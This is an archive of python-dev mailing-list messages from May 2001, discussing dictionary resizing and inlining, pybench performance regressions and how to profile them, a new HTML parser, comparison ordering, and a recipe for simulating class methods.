> That would allow the 10.8% of real(er) life dicts with fill 3 to continue > living in dicts with 4 slots, and allow about 90% of all dicts to get away > with no more than one resize. The downside is that boosting the max load > factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, > a small boost in the expected # of compares. But the "theory" is for random > hash functions with "uniform probing" (tech term that does *not* mean linear > probing), and Python's hash functions often aren't random at all, while AFAIK > no rigorous analysis of its probing strategy exists. > > So, plenty of arbitrary data there upon which to flip a coin. Why not make those parameters macros at the top of dictobject.c which can then be tuned to whatever the programmer needs/wants ?! -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Fri May 18 16:05:45 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 10:05:45 -0500 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400." References: Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it.
(I guess he means the buffer is alloc'ed contiguously with the dict object head. That's often a nice strategy. Could do that for small lists too maybe, except those haven't gotten anybody's attention just yet.) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the best performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling. Yeah, this one sounds like a nice improvement. --Guido van Rossum (home page: http://www.python.org/~guido/) From thomas@xs4all.net Fri May 18 16:00:21 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:00:21 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> Message-ID: <20010518170021.B16811@xs4all.nl> On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote: > (I guess he means the buffer is alloc'ed contiguously with the dict > object head. That's often a nice strategy. Could do that for small > lists too maybe, except those haven't gotten anybody's attention just > yet.) Sounds to me like it would benefit tuples even more than lists or dicts.
At least in my code, I see more short tuples than short lists, and they are usually not altered after creation ;-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From fdrake@acm.org Fri May 18 16:12:34 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Fri, 18 May 2001 11:12:34 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com> Thomas Wouters writes: > Sounds to me like it would benefit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) The slots of tuples are already allocated inline, so I don't think they'll get much better. ;-) -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido@digicool.com Fri May 18 16:27:39 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:27:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200." <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com> > > (I guess he means the buffer is alloc'ed contiguously with the dict > > object head. That's often a nice strategy. Could do that for small > > lists too maybe, except those haven't gotten anybody's attention just > > yet.) > > Sounds to me like it would benefit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) Which is why tuples already have this feature. Posted before your first cup of coffee?
:-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik@effbot.org Fri May 18 16:36:39 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Fri, 18 May 2001 17:36:39 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 References: Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid> guido wrote: > A much improved HTML parser -- a replacement for sgmllib. The API is > derived from but not quite compatible with that of sgmllib, so it's a > new file. I suppose it needs documentation, and htmllib needs to be > changed to use this instead of sgmllib, and sgmllib needs to be > declared obsolete. any reason this cannot be made compatible with sgmllib? Cheers /F From thomas@xs4all.net Fri May 18 16:36:42 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:36:42 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com> Message-ID: <20010518173642.S16791@xs4all.nl> On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote: > > > (I guess he means the buffer is alloc'ed contiguously with the dict > > > object head. That's often a nice strategy. Could do that for small > > > lists too maybe, except those haven't gotten anybody's attention just > > > yet.) > > > > Sounds to me like it would benefit tuples even more than lists or dicts. At > > least in my code, I see more short tuples than short lists, and they are > > usually not altered after creation ;-) > > Which is why tuples already have this feature. > > Posted before your first cup of coffee? :-) No, after my last meeting, before my first witbier of the Friday-afternoon-office-beer-binge :) TGIF ;) -- Thomas Wouters Hi!
I'm a .signature virus! copy me into your .signature file to help me spread! From guido@digicool.com Fri May 18 16:49:25 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:49:25 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200." <004401c0dfb0$57b7df00$e46940d5@hagrid> References: <004401c0dfb0$57b7df00$e46940d5@hagrid> Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com> > guido wrote: > > A much improved HTML parser -- a replacement for sgmllib. The API is > > derived from but not quite compatible with that of sgmllib, so it's a > > new file. I suppose it needs documentation, and htmllib needs to be > > changed to use this instead of sgmllib, and sgmllib needs to be > > declared obsolete. > > any reason this cannot be made compatible with sgmllib? The sgmllib API design has a few real bogosities. I can't recall what they were, but we looked into keeping it compatible, and it wasn't worth the pain. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Fri May 18 17:57:34 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 12:57:34 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200." <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> References: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com> > According to the CVS log, this implementation of do_cmp was installed > in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific > rationale for doing do_cmp in that order? You can ask me directly, loewis. :-) I believe that my thinking at the time was that tp_compare should only be used as a final fallback, just before comparing by address. This was consistent with my desire to completely get rid of tp_compare. 
But until that is done, I now agree that it makes more sense to try tp_compare first when a three-way-compare is requested -- especially in the light of sequence comparison. --Guido van Rossum (home page: http://www.python.org/~guido/) From nas@python.ca Fri May 18 18:37:33 2001 From: nas@python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 10:37:33 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> Message-ID: <20010518103733.A22185@glacier.fnational.com> M.-A. Lemburg wrote: > FYI, I have a patch which inlines small dictionaries directly > into the type object (rather than using malloc to allocate > the slot buffer). Would it be faster to inline an association table rather than a hash table? Neil From guido@digicool.com Fri May 18 18:43:45 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 13:43:45 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT." <20010518103733.A22185@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com> > Would it be faster to inline an association table rather than a > hash table? What's an association table?
--Guido van Rossum (home page: http://www.python.org/~guido/) From nas@python.ca Fri May 18 19:15:59 2001 From: nas@python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 11:15:59 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> Message-ID: <20010518111559.A22344@glacier.fnational.com> Guido van Rossum wrote: > What's an association table? A table of keys and values. Values are looked up by looping over the table comparing each key until the correct one is found (i.e. it's O(n) where n is the size of the table). For Python, the cost of doing compares probably outweighs the cost of doing the hashing, even for small tables. It's not clear to me though if it would be a win. Assuming that interned strings are the most common key, an association table with four entries would take on average two pointer compares to look up a value. Neil From mal@lemburg.com Fri May 18 19:15:37 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 20:15:37 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0566C9.90F17DB1@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it.
There you go: https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470 -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Fri May 18 19:23:55 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 14:23:55 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT." <20010518111559.A22344@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> <20010518111559.A22344@glacier.fnational.com> Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > What's an association table? > > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (i.e. > it's O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. > > It's not clear to me though if it would be a win. Assuming that > interned strings are the most common key, an association table with > four entries would take on average two pointer compares to look > up a value. > > Neil I see. At the cost of yet another algorithm, of course. --Guido van Rossum (home page: http://www.python.org/~guido/) From James_Althoff@i2.com Fri May 18 20:10:11 2001 From: James_Althoff@i2.com (James_Althoff@i2.com) Date: Fri, 18 May 2001 12:10:11 -0700 Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods) Message-ID: Python-dev'ers, Pardon the intrusion, but Aahz Maruch suggested that I post this to the python-dev list.
The message below illustrates "yet another class method recipe" that Costas synthesized (and which I then modified very slightly) from various posts following another discussion on python-list about class methods (as we all await the "type/class healing" stuff some of you are working on -- go team!). This variant uses explicit "metaclasses" (defined as regular classes) whose instances ("meta objects") point to class objects (since they cannot *be* class objects in current Python). Anyway, I think the approach has some nice properties. Best regards, Jim

----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM -----
James Althoff  05/14/01 02:09 PM
To: python-list@python.org
cc:
Subject: Re: Simulating Class (was Re: Does Python have Class methods)

Costas writes:
>Ok, so after looking thru how Python works and comments from people, I
>came up with what I believe may be the best way to implement Class
>methods and Class variables.
>
>
>
>Costas

I think this idea is quite good. I would amend it very slightly by suggesting the convention of defining *three* separate names in the enclosing module:

1) the name of the enclosing class
2) the name of the singleton instance of the enclosing class
3) the name of the enclosed class

To support this, I would propose using a naming convention as below. If one is interested in defining a class Spam, then use the following names:

1) SpamMetaClass -- names the enclosing class
2) SpamMeta -- names a singleton instance of the enclosing class
3) Spam -- names the enclosed class

Use the name SpamMetaClass when you need to derive a subclass of SpamMetaClass, e.g.,

    class SpecialSpamMetaClass(SpamMetaClass): pass

Use the name SpamMeta to invoke a class method, e.g.,

    SpamMeta.aClassMethod()

Use the name Spam to make instances as usual, e.g.,

    s = Spam()

(and to derive a subclass of Spam).
Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby -- that is to say, the class Spam is not an instance of SpamMetaClass -- nonetheless, SpamMetaClass still acts as a "higher level" class that provides methods on behalf of the class Spam where said methods are 1) independent of any particular instance of Spam and 2) allow for factory-method-style creation of Spam instances -- these being two very important attributes of the metaclass concept. Plus "meta" is a nice, short name. :-) Plus using "MetaClass" to refer to the class and "Meta" to refer to the singleton instance of "MetaClass" is reasonably clear and succinct, I think. One nice thing about the proposed recipe is that the SpamMeta object is a real class instance of a real class. This means that -- unlike when using the "module function" recipe -- we get inheritance of methods, and -- unlike when using the "callable wrapper class" recipe -- we also get override of methods. The example below illustrates both of these important capabilities. 
class Class1MetaClass:  # Base metaclass

    # Define "class methods" for Class1

    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    def new(self):  # Factory method
        """Return a new instance"""
        return self.Class1()

    def newList(self,n=3):  # Another factory method
        """Return a list of new instances"""
        l = []
        for i in range(n):
            newInstance = self.new()
            l.append(newInstance)
        return l

    # Define Class1 & its "instance methods"

    class Class1:  # Base class

        def whoami(self):
            print 'Class1.whoami:', self

Class1Meta = Class1MetaClass()  # Make & name the singleton metaclass instance
Class1 = Class1Meta.Class1  # Make the Class1 name accessible

class Class2MetaClass(Class1MetaClass):  # Derived metaclass

    # Define "class methods" for Class2 -- Override Class1 "class methods"

    def whoami(self):
        print 'Class2MetaClass.whoami:', self

    def new(self):  # Override the factory method
        return self.Class2()

    # Define Class2 & its "instance methods"

    class Class2(Class1):  # Derived class

        def whoami(self):
            print 'Class2.whoami:', self

Class2Meta = Class2MetaClass()  # Make & name the singleton metaclass instance
Class2 = Class2Meta.Class2  # Make the Class2 name accessible

# Test

Class1Meta.whoami()  # invoke "class method" of base class
Class2Meta.whoami()  # invoke "class method" of derived class

Class1().whoami()  # make an instance & invoke "instance method"
Class2().whoami()

print Class1Meta.newList()  # factory method
print Class2Meta.newList()  # inherit factory method with override

>>> reload(meta6)
Class1MetaClass.whoami:
Class2MetaClass.whoami:
Class1.whoami:
Class2.whoami:
[, , ]
[, , ]

Jim

From tim.one@home.com Fri May 18 20:26:02 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 18 May 2001 15:26:02 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B0509BF.A2F84A30@lemburg.com> Message-ID: [MAL] > It [pybench] doesn't claim "typical use".
pybench is aimed at finding > out performance issues about hot-spots -- there's no such thing as > a "typical program", so pybench gives you low level performance > compares for very specific tasks, e.g. dictionary creation or > for-loop performance. > > I have found it to be rather successful at that. At least gives > some good hints at where to look... There must be a misunderstanding here. I understand and appreciate all that! From the instant you created it, PyBench became the best performance canary we have ("canary" in the sense of bringing a bird into the coal mine with you, because when a potentially fatal buildup of gases occurs, the canary will pass out before you even notice). My point was that making a decision based solely on the fact that PyBench happens to create millions of dicts of exactly size 3, and relatively few of any other size, would be crazy -- which I'm sure you understand and appreciate too. > ... > I found that instance dictionaries are usually within the 8-slot > range. You normally have a few heavyweight instances and > many lightweight ones which only have two or three attributes > in their instance dict. Matches my observations too. [on dict resize parameters] > Why not make those parameters macros at the top of dictobject.c > which can then be tuned to whatever the programmer needs/wants ?! Bad idea, IMO. If someone understands the dict implementation well enough to be *competent* to change these without, e.g., opening a door to infinite loops, then they already know where these parameters appear, and can change the hardcoded #s themselves. The max load factor simply wasn't intended to be adjustable; and if it were, it would be a per-dict decision.
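The resize arithmetic in this thread can be checked directly against Tim's ma_fill table. The Python sketch below is a minimal model, not dictobject.c itself: it assumes, as Tim's figures imply, that a table of a given size may hold any fill that does not trip the resize test, and it uses only the per-fill percentages for fills 0 through 6 from his table. The function names are hypothetical.

```python
# Percent of dicts by final ma_fill, copied from Tim's test-suite table
# (only fills 0..6 are needed for the table sizes checked here).
PCT_BY_FILL = {0: 13.91, 1: 53.30, 2: 11.88, 3: 10.80, 4: 1.98, 5: 3.60, 6: 0.88}


def max_fill_two_thirds(size):
    """Largest fill that does not trip the current test fill*3 >= size*2."""
    return (2 * size - 1) // 3


def max_fill_three_quarters(size):
    """Largest fill that does not trip the proposed test fill*4 > size*3."""
    return (3 * size) // 4


def share_fitting(max_fill):
    """Percent of the sampled dicts whose fill is at most max_fill."""
    return round(sum(p for fill, p in PCT_BY_FILL.items() if fill <= max_fill), 2)


if __name__ == "__main__":
    for size in (4, 8):
        old, new = max_fill_two_thirds(size), max_fill_three_quarters(size)
        print("size %d: 2/3 rule fits fill <= %d (%.2f%%), 3/4 rule fits fill <= %d (%.2f%%)"
              % (size, old, share_fitting(old), new, share_fitting(new)))
```

Under these assumptions a 4-slot table holds fill 2 under the current rule and fill 3 under the proposed one, and an 8-slot table holds fill 5 but not 6, matching Tim's statements. Summing the per-fill column gives 95.47% for fill <= 5; the 93.49% cumulative figure is lower only because the table is sorted by popularity and lists fill 4 after fill 5.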
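Neil's association-table idea and the probe step Tim describes in his reply can be compared with a small model. This Python sketch assumes interned-string keys, so an identity test (`is`) stands in for the pointer compare, and it models only the shift-and-XOR increment of the hash table, not its starting point or its stop-at-empty-slot rule. The polynomial 11 (x**3 + x + 1) for an 8-slot table is an assumption chosen because it is primitive, and all helper names are hypothetical.

```python
def assoc_lookup_compares(keys, wanted):
    """Count identity compares a linear-scan association table makes."""
    compares = 0
    for key in keys:
        compares += 1
        if key is wanted:  # interned keys: a pointer compare suffices
            break
    return compares


def average_hit_compares(n):
    """Average compares for a hit when each of n keys is equally likely."""
    keys = [object() for _ in range(n)]
    return sum(assoc_lookup_compares(keys, k) for k in keys) / n


def probe_cycle(start, mask, poly):
    """Nonzero values visited by the step `i <<= 1; if (i > mask) i ^= poly`.

    Only the increment step is modelled; a real lookup also starts from
    hash & mask and stops when it reaches an empty slot.
    """
    visited = [start]
    i = start
    for _ in range(mask):  # there are at most `mask` distinct nonzero values
        i <<= 1
        if i > mask:
            i ^= poly
        if i == start:
            break
        visited.append(i)
    return visited


if __name__ == "__main__":
    print(average_hit_compares(4))  # hit: (1 + 2 + 3 + 4) / 4
    print(assoc_lookup_compares([object() for _ in range(4)], object()))  # miss
    print(probe_cycle(1, 7, 11))  # 8-slot table, assumed polynomial 8 + 3
```

With four equally likely keys the scan averages 2.5 compares on a hit and always makes 4 on a miss, which matches Tim's correction of Neil's estimate. With a primitive polynomial, the shift-and-XOR step visits every nonzero value below the table size before repeating.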
From tim.one@home.com Fri May 18 20:48:33 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 18 May 2001 15:48:33 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518111559.A22344@glacier.fnational.com> Message-ID: [Neil Schemenauer] > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (i.e. > it's O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. I thought about that before. The inlining appeals but the algorithm not much: the dict implementation *as is* loops over all the table entries too, except that instead of starting with "i = 0" it starts (now) with "i = hash & mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^= poly"; and instead of giving up when "i >= length" it punts when finding an entry with a null value. Incrementing via ++i is certainly cheaper, except that even when small, the hash table usually hits on the first try when the key is present, so it usually gets out before incrementing. > It's not clear to me though if it would be a win. Best guess is not. > Assuming that interned strings are the most common key, an association > table with four entries would take on average two pointer compares > to look up a value. Actually an average of 2.5 when the key is present and each key is equally likely to be queried, and always 4 when the queried key is not present. The hash table has better expected stats on both counts, but needs 4 unused slots too to achieve that. The savings would be in memory for small dicts more than in time (if at all). From jeremy@alum.mit.edu Fri May 18 22:07:37 2001 From: jeremy@alum.mit.edu (Jeremy Hylton) Date: Fri, 18 May 2001 17:07:37 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns Message-ID: <200105182107.RAA16214@cliff.concentric.net>
From jeremy@alum.mit.edu Fri May 18 22:07:37 2001 From: jeremy@alum.mit.edu (Jeremy Hylton) Date: Fri, 18 May 2001 17:07:37 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns Message-ID: <200105182107.RAA16214@cliff.concentric.net> I did some profiles of more of the pybench slowdowns this afternoon and found a few causes for several problem benchmarks. I just made a couple of small changes for BuiltinFunctionCalls. The problem here is that PyCFunction calls were optimized for flags == 0 and not flags == METH_VARARGS, which is more common. The scary thing about BuiltinFunctinoCalls is that the profiler shows it spending almost 30% of its time in PyArg_ParseTuple(). It certainly is a shame that we have this complicated, slow run-time parsing mechanism to deal with a static property of the code, namely how many arguments it takes and whether their types are. A few of the other tests, SimpleComplexArithmetic and CreateStringsWithConcat, are slower because of the new coercion logic. I didn't spend much time on SimpleComplexArithmetic, but I did look at CreateStringsWithConcat in some detail. The basic problem is that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls PyNumber_Add("ab", "cd"). This function tries all sorts of different ways to coerce the strings into addable numbers before giving up and trying sequence concat. It looks like the new coercion rules have optimized number ops at the expense of string ops. If you're writing programs with lots of numbers, you probably think that's peachy. If you're parsing HTML, perhaps you don't :-). I looked at the test suite to see how often it is called with non-number arguments. The answer is 77% of the time, but almost all of those calls are from test_unicodedata. If that one test is excluded, the majority of the calls (~90%) are with numbers. But the majority of those calls just come from a few tests -- test_pow, test_long, test_mutants, test_strftime. 
If I were to do something about the coercions, I would see if there was a way to quickly determine that PyNumber_Add() ain't gonna have any luck. Then we could bail to things like string_concat more quickly. I also looked at SmallLists. It seems that the only significant change since 1.5.2 is the garbage collection. This test spends a lot more time deallocating lists than it used to, and the only change I see in the code is the GC. I assume, but haven't checked, that the story is similar for SmallTuples. So the primary things that have slowed down since 1.5.2 seem to be: comparisons, coercion, and memory management for containers. These also seem to be the things that have improved the most in terms of features, completeness, etc. Looks like we need to revisit them and sort out the performance issues. Jeremy From guido@digicool.com Fri May 18 22:58:25 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 17:58:25 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT." <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> > The scary thing about BuiltinFunctionCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and what their types are. I would love to see a mechanism whereby the signature of a C function could be stored as part of the static info about it, in an extension of the PyMethodDef structure: this would serve as documentation, allow for introspection, etc. I'm sure Ping would love this for pydoc and his inspect module.
But I'm not sure how much we can speed things up, unless we give up on the tuple interface (an argc/argv API could be much faster since usually the arguments are already on the frame's stack in this form). > A few of the other tests, SimpleComplexArithmetic and > CreateStringsWithConcat, are slower because of the new coercion > logic. I didn't spend much time on SimpleComplexArithmetic, but I did > look at CreateStringsWithConcat in some detail. The basic problem is > that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls > PyNumber_Add("ab", "cd"). This function tries all sorts of different > ways to coerce the strings into addable numbers before giving up and > trying sequence concat. > > It looks like the new coercion rules have optimized number ops at the > expense of string ops. If you're writing programs with lots of > numbers, you probably think that's peachy. If you're parsing HTML, > perhaps you don't :-). > > I looked at the test suite to see how often it is called with > non-number arguments. The answer is 77% of the time, but almost all > of those calls are from test_unicodedata. If that one test is > excluded, the majority of the calls (~90%) are with numbers. But the > majority of those calls just come from a few tests -- test_pow, > test_long, test_mutants, test_strftime. > > If I were to do something about the coercions, I would see if there > was a way to quickly determine that PyNumber_Add() ain't gonna have > any luck. Then we could bail to things like string_concat more > quickly. There's already a special case for int+int in the BINARY_ADD opcode (otherwise you would probably see more numbers). Maybe another special case for str+str would help here? > I also looked at SmallLists. It seems that the only significant > change since 1.5.2 is the garbage collection. This test spends a lot > more time deallocating lists than it used to, and the only change I > see in the code is the GC.
I assume, but haven't checked, that the > story is similar for SmallTuples. > > So the primary things that have slowed down since 1.5.2 seem to be: > comparisons, coercion, and memory management for containers. These > also seem to be the things that have improved the most in terms of > features, completeness, etc. Looks like we need to revisit them and > sort out the performance issues. Thanks for doing all this work, Jeremy! I just hope that these performance hacks won't have to be redone when I'm done with healing the types/class split. I'm expecting that things can become a lot simpler if everything inherits from Object, sequences inherit from Sequence, and so on. But since I'm currently going slow on this work, I won't complain too much if the existing code gets optimized first. The stuff you already checked in looks good! --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy@digicool.com Fri May 18 23:06:05 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Fri, 18 May 2001 18:06:05 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> References: <200105182107.RAA16214@cliff.concentric.net> <200105182158.QAA01250@cj20424-a.reston1.va.home.com> Message-ID: <15109.40141.757071.770265@slothrop.digicool.com> In case anyone else is interested, here are two quick pointers on running pybench tests under the profiler.

1. To build Python with profiling hooks (Unix only):

    LDFLAGS="-pg" OPT="-pg" configure
    make

When you run python, it produces a gmon.out file. To run gprof, pass it the profile-enabled executable and gmon.out. It spits out the results on stdout.

2. Use this handy script (below) to run a single pybench test under the profiler and produce the output.
Jeremy

"""Tool to automate profiling of individual pybench benchmarks"""

import os
import re
import tempfile

PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python"
PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python"

rx_grep = re.compile('^([^:]+):(.*)')
rx_decl = re.compile('class (\w+)\(\w+\):')

def find_bench(name):
    p = os.popen("grep %s *.py" % name)
    for line in p.readlines():
        mo = rx_grep.search(line)
        if mo is None:
            continue
        file, text = mo.group(1, 2)
        mo = rx_decl.search(text)
        if mo is None:
            continue
        klass = mo.group(1)
        return file, klass
    return None, None

def write_profile_code(file, klass, path):
    i = file.find(".")
    file = file[:i]
    f = open(path, 'w')
    print >> f, "import %s" % file
    print >> f, "%s.%s().run()" % (file, klass)
    f.close()

def profile(interp, path, result):
    if os.path.exists("gmon.out"):
        os.unlink("gmon.out")
    os.system("PYTHONPATH=. %s %s" % (interp, path))
    if not os.path.exists("gmon.out"):
        raise RuntimeError, "gmon.out not generated by %s" % interp
    os.system("gprof %s gmon.out > %s" % (interp, result))

def main(bench_name):
    file, klass = find_bench(bench_name)
    if file is None:
        raise ValueError, "could not find class %s" % bench_name
    code_path = tempfile.mktemp()
    write_profile_code(file, klass, code_path)
    profile(PYCVS, code_path, "%s.cvs.prof" % bench_name)
    profile(PY152, code_path, "%s.152.prof" % bench_name)
    os.unlink(code_path)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])

From jim@interet.com Sat May 19 17:45:15 2001 From: jim@interet.com (James C. Ahlstrom) Date: Sat, 19 May 2001 12:45:15 -0400 Subject: [Python-Dev] [off topic] Python is taking over the world Message-ID: <3B06A31B.67A8D010@interet.com> I was in my local (Somerville, NJ) Borders bookstore last week and noticed that they stocked many Python books, most in multiple copies. It all added up to three feet of Python books. Great.
The clincher was when I went to my YMCA, and saw that someone had posted a flyer offering tutoring in Math, Physics, Java and Python. Congratulations to Guido and all on this list. JimA From guido@digicool.com Sun May 20 00:18:25 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 19 May 2001 19:18:25 -0400 Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com> For all you Douglas Adams fans out there: Douglas Noel Adams 1952 - 2001 http://www.douglasadams.com --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Sun May 20 10:31:25 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 05:31:25 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > If I set tp_richcompare of strings to 0, I get past this code, and do > > c = (*f)(v, w); > if (PyErr_Occurred()) Note that the usual way to write this is if (c < 0 && PyErr_Occurred()) More work for my artificial "ab" < "cd" case but a net win in real life (when c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, when c < 0 there's no way in the cmp protocol to use c's value alone to distinguish between "less than" and "error"). > return NULL; 